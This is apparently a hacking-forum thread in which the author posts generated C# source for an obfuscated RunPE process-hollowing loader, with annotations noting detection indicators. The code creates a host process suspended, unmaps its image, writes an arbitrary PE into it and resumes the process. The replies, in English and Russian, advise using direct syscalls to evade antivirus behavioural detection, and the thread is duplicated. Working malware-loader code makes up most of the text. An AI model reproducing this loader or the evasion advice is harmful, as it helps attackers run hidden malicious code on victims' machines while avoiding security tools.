
runPE Generator

mectury

Example output code:

C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ToGlanch
{
    // Defender note: this class is a textbook "RunPE" / process-hollowing loader
    // (MITRE ATT&CK T1055.012). The identifiers are obfuscated, but the DllImport
    // EntryPoint values give the real Win32/NT functions, and the fixed call order
    // below (CreateProcess suspended -> GetThreadContext -> ReadProcessMemory ->
    // NtUnmapViewOfSection -> VirtualAllocEx RWX -> WriteProcessMemory ->
    // SetThreadContext -> ResumeThread) is the behavioral indicator that
    // EDR/AV heuristics key on, regardless of how the source is renamed.
    public static class TaterTotsPots
    {
        // kernel32!CreateProcess (CharSet.Unicode lets the runtime probe the W
        // variant). startupInfo / processInformation are the obfuscated
        // STARTUPINFO / PROCESS_INFORMATION structs declared below.
        // SuppressUnmanagedCodeSecurity skips the CAS stack walk on each call.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref ToasterOven startupInfo, ref CayennePepper processInformation);
        // Thread-context accessors. The CONTEXT structure is passed as a raw
        // int[] instead of a typed struct; the 32-bit vs. Wow64 variants are
        // selected at call time from IntPtr.Size.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context);
        // Cross-process memory access. Addresses are plain int, so only
        // 32-bit address ranges can be expressed with these signatures.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
        // ntdll import used to unmap the host's original image (the "hollowing"
        // step). Note the EntryPoint string as written is "UnmapViewOfSection".
        [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress);
        // Remote allocation; called below with type 0x3000 and protect 0x40,
        // i.e. a committed RWX region in another process — by itself a strong
        // detection signal.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect);
        // Final step: resumes the suspended main thread at the patched entry point.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int ResumeThread_API(System.IntPtr handle);
        // Obfuscated PROCESS_INFORMATION (filled in by CreateProcess_API).
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        
        private struct CayennePepper
        {
            public System.IntPtr HasanHandle;   // hProcess
            public System.IntPtr TihradHandle;  // hThread
            public uint _processıd;             // dwProcessId (note the dotless ı in the name)
            public uint _threadıd;              // dwThreadId
        } // CayennePepper

        // Obfuscated STARTUPINFO. Only Size_ (cb) and FLAGSS (dwFlags) are set
        // explicitly before the CreateProcess call; the rest stay zero/null.
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        private struct ToasterOven
        {
            public uint Size_;          // cb
            public string _reversed1s_; // lpReserved
            public string _desktop_;    // lpDesktop
            public string _title_;      // lpTitle

            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public int FLAGSS;          // dwFlags
            public short wShowWindow;
            public short cbReserved2;
            public System.IntPtr Reserved2; // lpReserved2
            public System.IntPtr StdInput;  // hStdInput
            public System.IntPtr StdOutput; // hStdOutput
            public System.IntPtr StdError;  // hStdError
        }

        // Public entry point. Retries the hollowing routine up to five times and
        // returns on the first success.
        //   SpouseBalkans    - path of the host executable to create (suspended)
        //   GreaseYay        - extra command-line arguments appended after the quoted path
        //   AllspiceRate     - raw bytes of the PE image to be written into the host
        //   GingerbreadHouse - when true, do not fall back to an allocation at an
        //                      arbitrary address if the preferred ImageBase is unavailable
        // Defender note: every failed attempt leaves a create-suspended / kill pair
        // behind, so up to five such pairs can appear in process telemetry.
        public static bool CharketerBeer(string SpouseBalkans, string GreaseYay, byte[] AllspiceRate, bool GingerbreadHouse)
        {
            for (int fri = 1; fri <= 5; fri++)
            {
                if (EggBeaterDeader(SpouseBalkans, GreaseYay, AllspiceRate, GingerbreadHouse))
                    return true;
            }

            return false;
        } // Run
        // One hollowing attempt. Returns true when the suspended host thread was
        // resumed at the injected image's entry point; on any failure the host
        // process is killed and false is returned. Parameters mirror CharketerBeer
        // (ChowerGeneral = host path, ClamChowder = arguments, Inleavened = PE bytes,
        // MixingBowl = disallow fallback allocation).
        private static bool EggBeaterDeader(string ChowerGeneral, string ClamChowder, byte[] Inleavened, bool MixingBowl)
        {
            int ReadWrite = 0; // receives bytes read/written; never inspected
            string QuotedPath = string.Format("\"{0}\"", ChowerGeneral);

            ToasterOven SI = new ToasterOven();
            CayennePepper PI = new CayennePepper();

            SI.FLAGSS = 0;
            SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(ToasterOven)));

            try
            {
                if (!string.IsNullOrEmpty(ClamChowder))
                    QuotedPath = QuotedPath + " " + ClamChowder;

                // creationFlags 4 == CREATE_SUSPENDED: the host starts with its
                // main thread parked so its image can be swapped before it runs.
                if (!CreateProcess_API(ChowerGeneral, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, false, 4, System.IntPtr.Zero, null, ref SI, ref PI))
                    throw new System.Exception();

                // PE parsing, all from the in-memory byte array with no bounds
                // validation: e_lfanew at DOS offset 60, then PE32
                // OptionalHeader.ImageBase at NT headers + 52.
                int FileAddress = System.BitConverter.ToInt32(Inleavened, 60);
                int ImageBase = System.BitConverter.ToInt32(Inleavened, FileAddress + 52);

                // 179 ints == 716 bytes, the x86 CONTEXT size; index 0 is
                // ContextFlags = 0x10002 (CONTEXT_INTEGER). The int-sized addresses
                // and fixed x86 layout only make sense for a 32-bit target.
                int[] Context_ = new int[179];
                Context_[0] = 65538;

                if (System.IntPtr.Size == 4)
                {
                    if (!GetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_))   
                    throw new System.Exception();

                // Index 41 of the raw context is Ebx; the 4 bytes at Ebx+8 in the
                // target are read as its current image-base pointer (compared
                // against ImageBase here and overwritten further down).
                int Ebx = Context_[41];
                int BaseAddress = 0;

                if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
                    throw new System.Exception();

                // Only unmap the host image when it collides with the PE's
                // preferred base; a non-zero NTSTATUS is treated as failure.
                if (ImageBase == BaseAddress) 
                {
                    if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0))
                        throw new System.Exception();
                }

                int SizeOfImage = System.BitConverter.ToInt32(Inleavened, FileAddress + 80);
                int SizeOfHeaders = System.BitConverter.ToInt32(Inleavened, FileAddress + 84);

                // 12288 == MEM_COMMIT | MEM_RESERVE, 64 == PAGE_EXECUTE_READWRITE.
                // First try the preferred ImageBase; if that fails and the caller
                // allowed it, take whatever address the system hands back.
                bool AllowOverride = false;
                int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1 

        

                if (!MixingBowl && NewImageBase == 0)
                {
                    AllowOverride = true;
                    NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64);
                }

                if (NewImageBase == 0)
                    throw new System.Exception();


                // Copy the headers, then each section's raw data to its RVA.
                if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, Inleavened, SizeOfHeaders, ref ReadWrite))
                    throw new System.Exception();

                // Section table follows the PE32 NT headers (+248); 40-byte entries,
                // count from FileHeader.NumberOfSections at +6.
                int SectionOffset = FileAddress + 248;
                short NumberOfSections = System.BitConverter.ToInt16(Inleavened, FileAddress + 6);

                for (int fri = 0; fri <= NumberOfSections - 1; fri++)
                {
                    int VirtualAddress = System.BitConverter.ToInt32(Inleavened, SectionOffset + 12);
                    int SizeOfRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 16);
                    int PointerToRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 20);

                    if (!(SizeOfRawData == 0))
                    {
                        byte[] SectionData = new byte[SizeOfRawData - 1 + 1];
                        System.Buffer.BlockCopy(Inleavened, PointerToRawData, SectionData, 0, SectionData.Length);

                        if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
                            throw new System.Exception();
                    }

                    SectionOffset += 40;
                }

                // Point the target's image-base pointer (Ebx+8) at the new image.
                byte[] PointerData = System.BitConverter.GetBytes(NewImageBase);
                if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
                    throw new System.Exception();

                int AddressOfEntryPoint = System.BitConverter.ToInt32(Inleavened, FileAddress + 40);

                // Index 44 of the raw context is Eax, which the suspended thread's
                // startup path uses as the entry address. When the fallback
                // allocation was used, NewImageBase is reset to the preferred
                // ImageBase before the entry address is computed.
                if (AllowOverride)
                    NewImageBase = ImageBase;
                Context_[44] = NewImageBase + AddressOfEntryPoint;

                if (System.IntPtr.Size == 4)
                {
                    if (!SetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_))
                    throw new System.Exception();

                // ResumeThread returns the previous suspend count, or -1 on error.
                if (ResumeThread_API(PI.TihradHandle) == -1)
                    throw new System.Exception();
            }
            catch
            {
                // Catch-all: any failure above (including a marshalling or
                // EntryPointNotFound error) ends here. Process.GetProcessById
                // throws rather than returning null when the id is not found, so
                // that exception would propagate out of this handler.
                System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd));
                if (Pros != null)
                    Pros.Kill();

                return false;
            }

            return true;
        }
    }

}


I wrote the "runPE Generator" Project in February of 2022, I can get an offer to revive this project again.

I will send screenshots and runtime scans in the future to inform the readers more.

Stay tuned for now... :)
 
Example output code:

C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ToGlanch
{
    // Defender note: this class is a textbook "RunPE" / process-hollowing loader
    // (MITRE ATT&CK T1055.012). The identifiers are obfuscated, but the DllImport
    // EntryPoint values give the real Win32/NT functions, and the fixed call order
    // below (CreateProcess suspended -> GetThreadContext -> ReadProcessMemory ->
    // NtUnmapViewOfSection -> VirtualAllocEx RWX -> WriteProcessMemory ->
    // SetThreadContext -> ResumeThread) is the behavioral indicator that
    // EDR/AV heuristics key on, regardless of how the source is renamed.
    public static class TaterTotsPots
    {
        // kernel32!CreateProcess (CharSet.Unicode lets the runtime probe the W
        // variant). startupInfo / processInformation are the obfuscated
        // STARTUPINFO / PROCESS_INFORMATION structs declared below.
        // SuppressUnmanagedCodeSecurity skips the CAS stack walk on each call.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref ToasterOven startupInfo, ref CayennePepper processInformation);
        // Thread-context accessors. The CONTEXT structure is passed as a raw
        // int[] instead of a typed struct; the 32-bit vs. Wow64 variants are
        // selected at call time from IntPtr.Size.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context);
        // Cross-process memory access. Addresses are plain int, so only
        // 32-bit address ranges can be expressed with these signatures.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
        // ntdll import used to unmap the host's original image (the "hollowing"
        // step). Note the EntryPoint string as written is "UnmapViewOfSection".
        [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress);
        // Remote allocation; called below with type 0x3000 and protect 0x40,
        // i.e. a committed RWX region in another process — by itself a strong
        // detection signal.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect);
        // Final step: resumes the suspended main thread at the patched entry point.
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int ResumeThread_API(System.IntPtr handle);
        // Obfuscated PROCESS_INFORMATION (filled in by CreateProcess_API).
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
       
        private struct CayennePepper
        {
            public System.IntPtr HasanHandle;   // hProcess
            public System.IntPtr TihradHandle;  // hThread
            public uint _processıd;             // dwProcessId (note the dotless ı in the name)
            public uint _threadıd;              // dwThreadId
        } // CayennePepper

        // Obfuscated STARTUPINFO. Only Size_ (cb) and FLAGSS (dwFlags) are set
        // explicitly before the CreateProcess call; the rest stay zero/null.
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        private struct ToasterOven
        {
            public uint Size_;          // cb
            public string _reversed1s_; // lpReserved
            public string _desktop_;    // lpDesktop
            public string _title_;      // lpTitle

            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public int FLAGSS;          // dwFlags
            public short wShowWindow;
            public short cbReserved2;
            public System.IntPtr Reserved2; // lpReserved2
            public System.IntPtr StdInput;  // hStdInput
            public System.IntPtr StdOutput; // hStdOutput
            public System.IntPtr StdError;  // hStdError
        }

        // Public entry point. Retries the hollowing routine up to five times and
        // returns on the first success.
        //   SpouseBalkans    - path of the host executable to create (suspended)
        //   GreaseYay        - extra command-line arguments appended after the quoted path
        //   AllspiceRate     - raw bytes of the PE image to be written into the host
        //   GingerbreadHouse - when true, do not fall back to an allocation at an
        //                      arbitrary address if the preferred ImageBase is unavailable
        // Defender note: every failed attempt leaves a create-suspended / kill pair
        // behind, so up to five such pairs can appear in process telemetry.
        public static bool CharketerBeer(string SpouseBalkans, string GreaseYay, byte[] AllspiceRate, bool GingerbreadHouse)
        {
            for (int fri = 1; fri <= 5; fri++)
            {
                if (EggBeaterDeader(SpouseBalkans, GreaseYay, AllspiceRate, GingerbreadHouse))
                    return true;
            }

            return false;
        } // Run
        // One hollowing attempt. Returns true when the suspended host thread was
        // resumed at the injected image's entry point; on any failure the host
        // process is killed and false is returned. Parameters mirror CharketerBeer
        // (ChowerGeneral = host path, ClamChowder = arguments, Inleavened = PE bytes,
        // MixingBowl = disallow fallback allocation).
        private static bool EggBeaterDeader(string ChowerGeneral, string ClamChowder, byte[] Inleavened, bool MixingBowl)
        {
            int ReadWrite = 0; // receives bytes read/written; never inspected
            string QuotedPath = string.Format("\"{0}\"", ChowerGeneral);

            ToasterOven SI = new ToasterOven();
            CayennePepper PI = new CayennePepper();

            SI.FLAGSS = 0;
            SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(ToasterOven)));

            try
            {
                if (!string.IsNullOrEmpty(ClamChowder))
                    QuotedPath = QuotedPath + " " + ClamChowder;

                // creationFlags 4 == CREATE_SUSPENDED: the host starts with its
                // main thread parked so its image can be swapped before it runs.
                if (!CreateProcess_API(ChowerGeneral, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, false, 4, System.IntPtr.Zero, null, ref SI, ref PI))
                    throw new System.Exception();

                // PE parsing, all from the in-memory byte array with no bounds
                // validation: e_lfanew at DOS offset 60, then PE32
                // OptionalHeader.ImageBase at NT headers + 52.
                int FileAddress = System.BitConverter.ToInt32(Inleavened, 60);
                int ImageBase = System.BitConverter.ToInt32(Inleavened, FileAddress + 52);

                // 179 ints == 716 bytes, the x86 CONTEXT size; index 0 is
                // ContextFlags = 0x10002 (CONTEXT_INTEGER). The int-sized addresses
                // and fixed x86 layout only make sense for a 32-bit target.
                int[] Context_ = new int[179];
                Context_[0] = 65538;

                if (System.IntPtr.Size == 4)
                {
                    if (!GetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_))  
                    throw new System.Exception();

                // Index 41 of the raw context is Ebx; the 4 bytes at Ebx+8 in the
                // target are read as its current image-base pointer (compared
                // against ImageBase here and overwritten further down).
                int Ebx = Context_[41];
                int BaseAddress = 0;

                if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
                    throw new System.Exception();

                // Only unmap the host image when it collides with the PE's
                // preferred base; a non-zero NTSTATUS is treated as failure.
                if (ImageBase == BaseAddress)
                {
                    if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0))
                        throw new System.Exception();
                }

                int SizeOfImage = System.BitConverter.ToInt32(Inleavened, FileAddress + 80);
                int SizeOfHeaders = System.BitConverter.ToInt32(Inleavened, FileAddress + 84);

                // 12288 == MEM_COMMIT | MEM_RESERVE, 64 == PAGE_EXECUTE_READWRITE.
                // First try the preferred ImageBase; if that fails and the caller
                // allowed it, take whatever address the system hands back.
                bool AllowOverride = false;
                int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1

       

                if (!MixingBowl && NewImageBase == 0)
                {
                    AllowOverride = true;
                    NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64);
                }

                if (NewImageBase == 0)
                    throw new System.Exception();


                // Copy the headers, then each section's raw data to its RVA.
                if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, Inleavened, SizeOfHeaders, ref ReadWrite))
                    throw new System.Exception();

                // Section table follows the PE32 NT headers (+248); 40-byte entries,
                // count from FileHeader.NumberOfSections at +6.
                int SectionOffset = FileAddress + 248;
                short NumberOfSections = System.BitConverter.ToInt16(Inleavened, FileAddress + 6);

                for (int fri = 0; fri <= NumberOfSections - 1; fri++)
                {
                    int VirtualAddress = System.BitConverter.ToInt32(Inleavened, SectionOffset + 12);
                    int SizeOfRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 16);
                    int PointerToRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 20);

                    if (!(SizeOfRawData == 0))
                    {
                        byte[] SectionData = new byte[SizeOfRawData - 1 + 1];
                        System.Buffer.BlockCopy(Inleavened, PointerToRawData, SectionData, 0, SectionData.Length);

                        if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
                            throw new System.Exception();
                    }

                    SectionOffset += 40;
                }

                // Point the target's image-base pointer (Ebx+8) at the new image.
                byte[] PointerData = System.BitConverter.GetBytes(NewImageBase);
                if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
                    throw new System.Exception();

                int AddressOfEntryPoint = System.BitConverter.ToInt32(Inleavened, FileAddress + 40);

                // Index 44 of the raw context is Eax, which the suspended thread's
                // startup path uses as the entry address. When the fallback
                // allocation was used, NewImageBase is reset to the preferred
                // ImageBase before the entry address is computed.
                if (AllowOverride)
                    NewImageBase = ImageBase;
                Context_[44] = NewImageBase + AddressOfEntryPoint;

                if (System.IntPtr.Size == 4)
                {
                    if (!SetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_))
                    throw new System.Exception();

                // ResumeThread returns the previous suspend count, or -1 on error.
                if (ResumeThread_API(PI.TihradHandle) == -1)
                    throw new System.Exception();
            }
            catch
            {
                // Catch-all: any failure above (including a marshalling or
                // EntryPointNotFound error) ends here. Process.GetProcessById
                // throws rather than returning null when the id is not found, so
                // that exception would propagate out of this handler.
                System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd));
                if (Pros != null)
                    Pros.Kill();

                return false;
            }

            return true;
        }
    }

}


I wrote the "runPE Generator" Project in February of 2022, I can get an offer to revive this project again.

I will send screenshots and runtime scans in the future to inform the readers more.

Stay tuned for now... :)
RunPE in its classical form is complete bullshit now. I'll explain why. Even if you confuse the code at the source level, generate it unique, you will only get rid of the signature detection, you still have key calls to api functions such as CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread. These functions are intercepted and a call map is made, tracking both call order and call parameters, which triggers heuristics and behavioral analysis.

RunPE в классическом его представлении является полной херней сейчас. Обьясню почему. Даже если ты запутал код на уровне исходников, сгенерировал его уникальным, ты избавишься только от сигнатурного детекта, у тебя остаются ключевые вызовы апи функций, такие как CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext и ResumeThread. Эти функции перехватываются и составляется карта вызовов с отслеживанием как порядка вызовов так и параметров вызовов, которая триггерит эвристику и поведенческий анализ.
 
RunPE in its classical form is complete bullshit now. I'll explain why. Even if you confuse the code at the source level, generate it unique, you will only get rid of the signature detection, you still have key calls to api functions such as CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread. These functions are intercepted and a call map is made, tracking both call order and call parameters, which triggers heuristics and behavioral analysis.

RunPE в классическом его представлении является полной херней сейчас. Обьясню почему. Даже если ты запутал код на уровне исходников, сгенерировал его уникальным, ты избавишься только от сигнатурного детекта, у тебя остаются ключевые вызовы апи функций, такие как CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext и ResumeThread. Эти функции перехватываются и составляется карта вызовов с отслеживанием как порядка вызовов так и параметров вызовов, которая триггерит эвристику и поведенческий анализ.
It's ridiculous to try to undermine an old project I did before I took the exam, apparently you didn't read the thread. I will revive this project in the future and I wonder what the new curious kids will talk about this time =))
 
It's ridiculous to try to undermine an old project I did before I took the exam, apparently you didn't read the thread. I will revive this project in the future and I wonder what the new curious kids will talk about this time =))
Dude, you are strange, I give you advice, and you are aggro, it would be better if you didn’t show off, but took it into account, otherwise you look like a notorious teenager. Why post classic RunPE code that is 15 years old, no less. All calls are intercepted, by some AVs even in the kernel, so in order for the old RunPE to sparkle with new colors, you need to call all Nt functions from your own code using syscall, then and only then it will work, otherwise you will get a behavioral detection in runtime. The fact that this is an old project is no excuse, the method is already over 15 years old.
 
Dude, you are strange, I give you advice, and you are aggro, it would be better if you didn’t show off, but took it into account, otherwise you look like a notorious teenager. Why post classic RunPE code that is 15 years old, no less. All calls are intercepted, by some AVs even in the kernel, so in order for the old RunPE to sparkle with new colors, you need to call all Nt functions from your own code using syscall, then and only then it will work, otherwise you will get a behavioral detection in runtime. The fact that this is an old project is no excuse, the method is already over 15 years old.
I wrote it ironically, I think I will prove myself with a new method. I don't have much time because of the work I'm busy with. I'm sure I will come in 1-2 months. by the way thank you for letting me know notoriety is for fools
 
I wrote it ironically, I think I will prove myself with a new method. I don't have much time because of the work I'm busy with. I'm sure I will come in 1-2 months. by the way thank you for letting me know notoriety is for fools
This method will be good if it is not implemented in the classical form
 

